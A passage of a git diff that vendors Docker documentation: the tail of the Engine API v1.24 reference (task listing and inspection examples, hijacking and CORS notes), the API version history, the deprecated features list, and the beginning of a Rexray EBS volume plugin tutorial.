"Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.10/16" + ] + } + ], + }, + { + "ID": "1yljwbmlr8er2waf8orvqpwms", + "Version": { + "Index": 30 + }, + "CreatedAt": "2016-06-07T21:07:30.019104782Z", + "UpdatedAt": "2016-06-07T21:07:30.231958098Z", + "Name": "hopeful_cori", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:30.202183143Z", + "State": "shutdown", + "Message": "shutdown", + "ContainerStatus": { + "ContainerID": "1cf8d63d18e79668b0004a4be4c6ee58cddfad2dae29506d8781581d0688a213" + } + }, + "DesiredState": "shutdown", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.5/16" + ] + } + ] + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + services list. Available filters: + - `id=` + - `name=` + - `service=` + - `node=` + - `label=key` or `label="key=value"` + - `desired-state=(running | shutdown | accepted)` + +**Status codes**: + +- **200** – no error +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect a task + + +`GET /tasks/(id)` + +Get details on the task `id` + +**Example request**: + + GET /v1.24/tasks/0kzzo1i0y4jz6027t0k7aezc7 HTTP/1.1 + +**Example response**: + + { + "ID": "0kzzo1i0y4jz6027t0k7aezc7", + "Version": { + "Index": 71 + }, + "CreatedAt": "2016-06-07T21:07:31.171892745Z", + "UpdatedAt": "2016-06-07T21:07:31.376370513Z", + "Spec": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "ServiceID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Slot": 1, + "NodeID": "60gvrl6tm78dmak4yl7srz94v", + "Status": { + "Timestamp": "2016-06-07T21:07:31.290032978Z", + "State": "running", + "Message": "started", + "ContainerStatus": { + "ContainerID": "e5d62702a1b48d01c3e02ca1e0212a250801fa8d67caca0b6f35919ebc12f035", + "PID": 677 + } + }, + "DesiredState": "running", + "NetworksAttachments": [ + { + "Network": { + "ID": "4qvuz4ko70xaltuqbt8956gd1", + "Version": { + "Index": 18 + }, + "CreatedAt": "2016-06-07T20:31:11.912919752Z", + "UpdatedAt": "2016-06-07T21:07:29.955277358Z", + "Spec": { + "Name": "ingress", + "Labels": { + "com.docker.swarm.internal": "true" + }, + "DriverConfiguration": {}, + "IPAMOptions": { + "Driver": {}, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "DriverState": { + "Name": "overlay", + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + } + }, + "IPAMOptions": { + "Driver": { + "Name": "default" + }, + "Configs": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + } + }, + "Addresses": [ + "10.255.0.10/16" + ] + } + ] + } + +**Status codes**: + +- **200** – no error +- **404** – unknown task +- **406** - node is not part of a swarm +- **500** – server error + +## 4. Going further + +### 4.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 4.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 4.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/version-history.md b/vendor/github.com/docker/docker/docs/api/version-history.md new file mode 100644 index 0000000000..4363cfbd74 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/version-history.md @@ -0,0 +1,249 @@ +--- +title: "Engine API version history" +description: "Documentation of changes that have been made to Engine API." +keywords: "API, Docker, rcli, REST, documentation" +--- + + + +## v1.26 API changes + +[Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation + +* `POST /plugins/(plugin name)/upgrade` upgrade a plugin. + +## v1.25 API changes + +[Docker Engine API v1.25](https://docs.docker.com/engine/api/v1.25/) documentation + +* The API version is now required in all API calls. Instead of just requesting, for example, the URL `/containers/json`, you must now request `/v1.25/containers/json`. +* `GET /version` now returns `MinAPIVersion`. +* `POST /build` accepts `networkmode` parameter to specify network used during build. +* `GET /images/(name)/json` now returns `OsVersion` if populated +* `GET /info` now returns `Isolation`. +* `POST /containers/create` now takes `AutoRemove` in HostConfig, to enable auto-removal of the container on daemon side when the container's process exits. +* `GET /containers/json` and `GET /containers/(id or name)/json` now return `"removing"` as a value for the `State.Status` field if the container is being removed. Previously, "exited" was returned as status. +* `GET /containers/json` now accepts `removing` as a valid value for the `status` filter. +* `GET /containers/json` now supports filtering containers by `health` status. +* `DELETE /volumes/(name)` now accepts a `force` query parameter to force removal of volumes that were already removed out of band by the volume driver plugin. +* `POST /containers/create/` and `POST /containers/(name)/update` now validates restart policies. +* `POST /containers/create` now validates IPAMConfig in NetworkingConfig, and returns error for invalid IPv4 and IPv6 addresses (`--ip` and `--ip6` in `docker create/run`). +* `POST /containers/create` now takes a `Mounts` field in `HostConfig` which replaces `Binds`, `Volumes`, and `Tmpfs`. *note*: `Binds`, `Volumes`, and `Tmpfs` are still available and can be combined with `Mounts`. +* `POST /build` now performs a preliminary validation of the `Dockerfile` before starting the build, and returns an error if the syntax is incorrect. Note that this change is _unversioned_ and applied to all API versions. +* `POST /build` accepts `cachefrom` parameter to specify images used for build cache. +* `GET /networks/` endpoint now correctly returns a list of *all* networks, + instead of the default network if a trailing slash is provided, but no `name` + or `id`. +* `DELETE /containers/(name)` endpoint now returns an error of `removal of container name is already in progress` with status code of 400, when container name is in a state of removal in progress. +* `GET /containers/json` now supports a `is-task` filter to filter + containers that are tasks (part of a service in swarm mode). +* `POST /containers/create` now takes `StopTimeout` field. +* `POST /services/create` and `POST /services/(id or name)/update` now accept `Monitor` and `MaxFailureRatio` parameters, which control the response to failures during service updates. +* `POST /services/(id or name)/update` now accepts a `ForceUpdate` parameter inside the `TaskTemplate`, which causes the service to be updated even if there are no changes which would ordinarily trigger an update. +* `POST /services/create` and `POST /services/(id or name)/update` now return a `Warnings` array. +* `GET /networks/(name)` now returns field `Created` in response to show network created time. +* `POST /containers/(id or name)/exec` now accepts an `Env` field, which holds a list of environment variables to be set in the context of the command execution. +* `GET /volumes`, `GET /volumes/(name)`, and `POST /volumes/create` now return the `Options` field which holds the driver specific options to use for when creating the volume. +* `GET /exec/(id)/json` now returns `Pid`, which is the system pid for the exec'd process. +* `POST /containers/prune` prunes stopped containers. +* `POST /images/prune` prunes unused images. +* `POST /volumes/prune` prunes unused volumes. +* `POST /networks/prune` prunes unused networks. +* Every API response now includes a `Docker-Experimental` header specifying if experimental features are enabled (value can be `true` or `false`). +* Every API response now includes a `API-Version` header specifying the default API version of the server. +* The `hostConfig` option now accepts the fields `CpuRealtimePeriod` and `CpuRtRuntime` to allocate cpu runtime to rt tasks when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel. +* The `SecurityOptions` field within the `GET /info` response now includes `userns` if user namespaces are enabled in the daemon. +* `GET /nodes` and `GET /node/(id or name)` now return `Addr` as part of a node's `Status`, which is the address that that node connects to the manager from. +* The `HostConfig` field now includes `NanoCPUs` that represents CPU quota in units of 10-9 CPUs. +* `GET /info` now returns more structured information about security options. +* The `HostConfig` field now includes `CpuCount` that represents the number of CPUs available for execution by the container. Windows daemon only. +* `POST /services/create` and `POST /services/(id or name)/update` now accept the `TTY` parameter, which allocate a pseudo-TTY in container. +* `POST /services/create` and `POST /services/(id or name)/update` now accept the `DNSConfig` parameter, which specifies DNS related configurations in resolver configuration file (resolv.conf) through `Nameservers`, `Search`, and `Options`. +* `GET /networks/(id or name)` now includes IP and name of all peers nodes for swarm mode overlay networks. +* `GET /plugins` list plugins. +* `POST /plugins/pull?name=` pulls a plugin. +* `GET /plugins/(plugin name)` inspect a plugin. +* `POST /plugins/(plugin name)/set` configure a plugin. +* `POST /plugins/(plugin name)/enable` enable a plugin. +* `POST /plugins/(plugin name)/disable` disable a plugin. +* `POST /plugins/(plugin name)/push` push a plugin. +* `POST /plugins/create?name=(plugin name)` create a plugin. +* `DELETE /plugins/(plugin name)` delete a plugin. +* `POST /node/(id or name)/update` now accepts both `id` or `name` to identify the node to update. +* `GET /images/json` now support a `reference` filter. +* `GET /secrets` returns information on the secrets. +* `POST /secrets/create` creates a secret. +* `DELETE /secrets/{id}` removes the secret `id`. +* `GET /secrets/{id}` returns information on the secret `id`. +* `POST /secrets/{id}/update` updates the secret `id`. + +## v1.24 API changes + +[Docker Engine API v1.24](v1.24.md) documentation + +* `POST /containers/create` now takes `StorageOpt` field. +* `GET /info` now returns `SecurityOptions` field, showing if `apparmor`, `seccomp`, or `selinux` is supported. +* `GET /info` no longer returns the `ExecutionDriver` property. This property was no longer used after integration + with ContainerD in Docker 1.11. +* `GET /networks` now supports filtering by `label` and `driver`. +* `GET /containers/json` now supports filtering containers by `network` name or id. +* `POST /containers/create` now takes `IOMaximumBandwidth` and `IOMaximumIOps` fields. Windows daemon only. +* `POST /containers/create` now returns an HTTP 400 "bad parameter" message + if no command is specified (instead of an HTTP 500 "server error") +* `GET /images/search` now takes a `filters` query parameter. +* `GET /events` now supports a `reload` event that is emitted when the daemon configuration is reloaded. +* `GET /events` now supports filtering by daemon name or ID. +* `GET /events` now supports a `detach` event that is emitted on detaching from container process. +* `GET /events` now supports an `exec_detach ` event that is emitted on detaching from exec process. +* `GET /images/json` now supports filters `since` and `before`. +* `POST /containers/(id or name)/start` no longer accepts a `HostConfig`. +* `POST /images/(name)/tag` no longer has a `force` query parameter. +* `GET /images/search` now supports maximum returned search results `limit`. +* `POST /containers/{name:.*}/copy` is now removed and errors out starting from this API version. +* API errors are now returned as JSON instead of plain text. +* `POST /containers/create` and `POST /containers/(id)/start` allow you to configure kernel parameters (sysctls) for use in the container. +* `POST /containers//exec` and `POST /exec//start` + no longer expects a "Container" field to be present. This property was not used + and is no longer sent by the docker client. +* `POST /containers/create/` now validates the hostname (should be a valid RFC 1123 hostname). +* `POST /containers/create/` `HostConfig.PidMode` field now accepts `container:`, + to have the container join the PID namespace of an existing container. + +## v1.23 API changes + +[Docker Engine API v1.23](v1.23.md) documentation + +* `GET /containers/json` returns the state of the container, one of `created`, `restarting`, `running`, `paused`, `exited` or `dead`. +* `GET /containers/json` returns the mount points for the container. +* `GET /networks/(name)` now returns an `Internal` field showing whether the network is internal or not. +* `GET /networks/(name)` now returns an `EnableIPv6` field showing whether the network has ipv6 enabled or not. +* `POST /containers/(name)/update` now supports updating container's restart policy. +* `POST /networks/create` now supports enabling ipv6 on the network by setting the `EnableIPv6` field (doing this with a label will no longer work). +* `GET /info` now returns `CgroupDriver` field showing what cgroup driver the daemon is using; `cgroupfs` or `systemd`. +* `GET /info` now returns `KernelMemory` field, showing if "kernel memory limit" is supported. +* `POST /containers/create` now takes `PidsLimit` field, if the kernel is >= 4.3 and the pids cgroup is supported. +* `GET /containers/(id or name)/stats` now returns `pids_stats`, if the kernel is >= 4.3 and the pids cgroup is supported. +* `POST /containers/create` now allows you to override usernamespaces remapping and use privileged options for the container. +* `POST /containers/create` now allows specifying `nocopy` for named volumes, which disables automatic copying from the container path to the volume. +* `POST /auth` now returns an `IdentityToken` when supported by a registry. +* `POST /containers/create` with both `Hostname` and `Domainname` fields specified will result in the container's hostname being set to `Hostname`, rather than `Hostname.Domainname`. +* `GET /volumes` now supports more filters, new added filters are `name` and `driver`. +* `GET /containers/(id or name)/logs` now accepts a `details` query parameter to stream the extra attributes that were provided to the containers `LogOpts`, such as environment variables and labels, with the logs. +* `POST /images/load` now returns progress information as a JSON stream, and has a `quiet` query parameter to suppress progress details. + +## v1.22 API changes + +[Docker Engine API v1.22](v1.22.md) documentation + +* `POST /container/(name)/update` updates the resources of a container. +* `GET /containers/json` supports filter `isolation` on Windows. +* `GET /containers/json` now returns the list of networks of containers. +* `GET /info` Now returns `Architecture` and `OSType` fields, providing information + about the host architecture and operating system type that the daemon runs on. +* `GET /networks/(name)` now returns a `Name` field for each container attached to the network. +* `GET /version` now returns the `BuildTime` field in RFC3339Nano format to make it + consistent with other date/time values returned by the API. +* `AuthConfig` now supports a `registrytoken` for token based authentication +* `POST /containers/create` now has a 4M minimum value limit for `HostConfig.KernelMemory` +* Pushes initiated with `POST /images/(name)/push` and pulls initiated with `POST /images/create` + will be cancelled if the HTTP connection making the API request is closed before + the push or pull completes. +* `POST /containers/create` now allows you to set a read/write rate limit for a + device (in bytes per second or IO per second). +* `GET /networks` now supports filtering by `name`, `id` and `type`. +* `POST /containers/create` now allows you to set the static IPv4 and/or IPv6 address for the container. +* `POST /networks/(id)/connect` now allows you to set the static IPv4 and/or IPv6 address for the container. +* `GET /info` now includes the number of containers running, stopped, and paused. +* `POST /networks/create` now supports restricting external access to the network by setting the `Internal` field. +* `POST /networks/(id)/disconnect` now includes a `Force` option to forcefully disconnect a container from network +* `GET /containers/(id)/json` now returns the `NetworkID` of containers. +* `POST /networks/create` Now supports an options field in the IPAM config that provides options + for custom IPAM plugins. +* `GET /networks/{network-id}` Now returns IPAM config options for custom IPAM plugins if any + are available. +* `GET /networks/` now returns subnets info for user-defined networks. +* `GET /info` can now return a `SystemStatus` field useful for returning additional information about applications + that are built on top of engine. + +## v1.21 API changes + +[Docker Engine API v1.21](v1.21.md) documentation + +* `GET /volumes` lists volumes from all volume drivers. +* `POST /volumes/create` to create a volume. +* `GET /volumes/(name)` get low-level information about a volume. +* `DELETE /volumes/(name)` remove a volume with the specified name. +* `VolumeDriver` was moved from `config` to `HostConfig` to make the configuration portable. +* `GET /images/(name)/json` now returns information about an image's `RepoTags` and `RepoDigests`. +* The `config` option now accepts the field `StopSignal`, which specifies the signal to use to kill a container. +* `GET /containers/(id)/stats` will return networking information respectively for each interface. +* The `HostConfig` option now includes the `DnsOptions` field to configure the container's DNS options. +* `POST /build` now optionally takes a serialized map of build-time variables. +* `GET /events` now includes a `timenano` field, in addition to the existing `time` field. +* `GET /events` now supports filtering by image and container labels. +* `GET /info` now lists engine version information and return the information of `CPUShares` and `Cpuset`. +* `GET /containers/json` will return `ImageID` of the image used by container. +* `POST /exec/(name)/start` will now return an HTTP 409 when the container is either stopped or paused. +* `POST /containers/create` now takes `KernelMemory` in HostConfig to specify kernel memory limit. +* `GET /containers/(name)/json` now accepts a `size` parameter. Setting this parameter to '1' returns container size information in the `SizeRw` and `SizeRootFs` fields. +* `GET /containers/(name)/json` now returns a `NetworkSettings.Networks` field, + detailing network settings per network. This field deprecates the + `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`, + `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which + are still returned for backward-compatibility, but will be removed in a future version. +* `GET /exec/(id)/json` now returns a `NetworkSettings.Networks` field, + detailing networksettings per network. This field deprecates the + `NetworkSettings.Gateway`, `NetworkSettings.IPAddress`, + `NetworkSettings.IPPrefixLen`, and `NetworkSettings.MacAddress` fields, which + are still returned for backward-compatibility, but will be removed in a future version. +* The `HostConfig` option now includes the `OomScoreAdj` field for adjusting the + badness heuristic. This heuristic selects which processes the OOM killer kills + under out-of-memory conditions. + +## v1.20 API changes + +[Docker Engine API v1.20](v1.20.md) documentation + +* `GET /containers/(id)/archive` get an archive of filesystem content from a container. +* `PUT /containers/(id)/archive` upload an archive of content to be extracted to +an existing directory inside a container's filesystem. +* `POST /containers/(id)/copy` is deprecated in favor of the above `archive` +endpoint which can be used to download files and directories from a container. +* The `hostConfig` option now accepts the field `GroupAdd`, which specifies a +list of additional groups that the container process will run as. + +## v1.19 API changes + +[Docker Engine API v1.19](v1.19.md) documentation + +* When the daemon detects a version mismatch with the client, usually when +the client is newer than the daemon, an HTTP 400 is now returned instead +of a 404. +* `GET /containers/(id)/stats` now accepts `stream` bool to get only one set of stats and disconnect. +* `GET /containers/(id)/logs` now accepts a `since` timestamp parameter. +* `GET /info` The fields `Debug`, `IPv4Forwarding`, `MemoryLimit`, and +`SwapLimit` are now returned as boolean instead of as an int. In addition, the +end point now returns the new boolean fields `CpuCfsPeriod`, `CpuCfsQuota`, and +`OomKillDisable`. +* The `hostConfig` option now accepts the fields `CpuPeriod` and `CpuQuota` +* `POST /build` accepts `cpuperiod` and `cpuquota` options + +## v1.18 API changes + +[Docker Engine API v1.18](v1.18.md) documentation + +* `GET /version` now returns `Os`, `Arch` and `KernelVersion`. +* `POST /containers/create` and `POST /containers/(id)/start`allow you to set ulimit settings for use in the container. +* `GET /info` now returns `SystemTime`, `HttpProxy`,`HttpsProxy` and `NoProxy`. +* `GET /images/json` added a `RepoDigests` field to include image digest information. +* `POST /build` can now set resource constraints for all containers created for the build. +* `CgroupParent` can be passed in the host config to setup container cgroups under a specific cgroup. +* `POST /build` closing the HTTP request cancels the build +* `POST /containers/(id)/exec` includes `Warnings` field to response. diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md new file mode 100644 index 0000000000..1298370ba9 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/deprecated.md @@ -0,0 +1,286 @@ +--- +aliases: ["/engine/misc/deprecated/"] +title: "Deprecated Engine Features" +description: "Deprecated Features." +keywords: "docker, documentation, about, technology, deprecate" +--- + + + +# Deprecated Engine Features + +The following list of features are deprecated in Engine. +To learn more about Docker Engine's deprecation policy, +see [Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy). + + +### Top-level network properties in NetworkSettings + +**Deprecated In Release: v1.13.0** + +**Target For Removal In Release: v1.16** + +When inspecting a container, `NetworkSettings` contains top-level information +about the default ("bridge") network; + +`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, +`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`. + +These properties are deprecated in favor of per-network properties in +`NetworkSettings.Networks`. These properties were already "deprecated" in +docker 1.9, but kept around for backward compatibility. + +Refer to [#17538](https://github.com/docker/docker/pull/17538) for further +information. + +## `filter` param for `/images/json` endpoint +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The `filter` param to filter the list of image by reference (name or name:tag) is now implemented as a regular filter, named `reference`. + +### `repository:shortid` image references +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +`repository:shortid` syntax for referencing images is very little used, collides with tag references can be confused with digest references. + +### `docker daemon` subcommand +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The daemon is moved to a separate binary (`dockerd`), and should be used instead. + +### Duplicate keys with conflicting values in engine labels +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +Duplicate keys with conflicting values have been deprecated. A warning is displayed +in the output, and an error will be returned in the future. + +### `MAINTAINER` in Dockerfile +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +`MAINTAINER` was an early very limited form of `LABEL` which should be used instead. + +### API calls without a version +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +API versions should be supplied to all API calls to ensure compatibility with +future Engine versions. Instead of just requesting, for example, the URL +`/containers/json`, you must now request `/v1.25/containers/json`. + +### Backing filesystem without `d_type` support for overlay/overlay2 +**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +**Target For Removal In Release: v1.16** + +The overlay and overlay2 storage driver does not work as expected if the backing +filesystem does not support `d_type`. For example, XFS does not support `d_type` +if it is formatted with the `ftype=0` option. + +Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for +further information. + +### Three arguments form in `docker import` +**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It's no more supported. + +### `-h` shorthand for `--help` + +**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +**Target For Removal In Release: v1.15** + +The shorthand (`-h`) is less common than `--help` on Linux and cannot be used +on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on +`docker create`). For this reason, the `-h` shorthand was not printed in the +"usage" output of subcommands, nor documented, and is now marked "deprecated". + +### `-e` and `--email` flags on `docker login` +**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** + +**Target For Removal In Release: v1.14** + +The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated. + +### Separator (`:`) of `--security-opt` flag on `docker run` +**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)** + +**Target For Removal In Release: v1.14** + +The flag `--security-opt` doesn't use the colon separator(`:`) anymore to divide keys and values, it uses the equal symbol(`=`) for consistency with other similar flags, like `--storage-opt`. + +### `/containers/(id or name)/copy` endpoint + +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`. + +### Ambiguous event fields in API +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a more rich structure. +See the events API documentation for the new format. + +### `-f` flag on `docker tag` +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is not longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use. + +### HostConfig at API container start +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of +defining it at container creation (`POST /containers/create`). + +### `--before` and `--since` flags on `docker ps` + +**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The `docker ps --before` and `docker ps --since` options are deprecated. +Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead. + +### `--automated` and `--stars` flags on `docker search` + +**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +**Target For Removal In Release: v1.15** + +The `docker search --automated` and `docker search --stars` options are deprecated. +Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead. + +### Driver Specific Log Tags +**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Log tags are now generated in a standard way across different logging drivers. +Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and +`fluentd-tag` have been deprecated in favor of the generic `tag` option. + + docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" + +### LXC built-in exec driver +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed. + +### Old Command Line Options +**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)** + +**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)** + +The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand: + + docker daemon -H ... + +The following single-dash (`-opt`) variant of certain command line options +are deprecated and replaced with double-dash options (`--opt`): + + docker attach -nostdin + docker attach -sig-proxy + docker build -no-cache + docker build -rm + docker commit -author + docker commit -run + docker events -since + docker history -notrunc + docker images -notrunc + docker inspect -format + docker ps -beforeId + docker ps -notrunc + docker ps -sinceId + docker rm -link + docker run -cidfile + docker run -dns + docker run -entrypoint + docker run -expose + docker run -link + docker run -lxc-conf + docker run -n + docker run -privileged + docker run -volumes-from + docker search -notrunc + docker search -stars + docker search -t + docker search -trusted + docker tag -force + +The following double-dash options are deprecated and have no replacement: + + docker run --cpuset + docker run --networking + docker ps --since-id + docker ps --before-id + docker search --trusted + +**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +The single-dash (`-help`) was removed, in favor of the double-dash `--help` + + docker -help + docker [COMMAND] -help + +### `--run` flag on docker commit + +**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)** + +**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)** + +The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor +of the `--changes` flag that allows to pass `Dockerfile` commands. + + +### Interacting with V1 registries + +**Disabled By Default In Release: v1.14** + +**Target For Removal In Release: v1.17** + +Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the +docker daemon from `pull`, `push`, and `login` operations against v1 +registries. Though enabled by default, this signals the intent to deprecate +the v1 protocol. + +Support for the v1 protocol to the public registry was removed in 1.13. Any +mirror configurations using v1 should be updated to use a +[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/). + +### Docker Content Trust ENV passphrase variables name change +**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)** + +**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)** + +Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables + +- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE +- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md new file mode 100644 index 0000000000..8c64efa164 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md @@ -0,0 +1,164 @@ +--- +description: Volume plugin for Amazon EBS +keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume" +title: Volume plugin for Amazon EBS +--- + + + +# A proof-of-concept Rexray plugin + +In this example, a simple Rexray plugin will be created for the purposes of using +it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin. + +The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin). + +To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray) + +## 1. Make a Docker image + +The following is the Dockerfile used to containerize rexray. + +```Dockerfile +FROM debian:jessie +RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates +RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz +RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes +ENTRYPOINT ["rexray"] +CMD ["--help"] +``` + +To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image` +will reference the containerized rexray image. + +## 2. Extract rootfs + +```sh +$ TMPDIR=/tmp/rexray # for the purpose of this example +$ # create container without running it, to extract the rootfs from image +$ docker create --name rexray "$image" +$ # save the rootfs to a tar archive +$ docker export -o $TMPDIR/rexray.tar rexray +$ # extract rootfs from tar 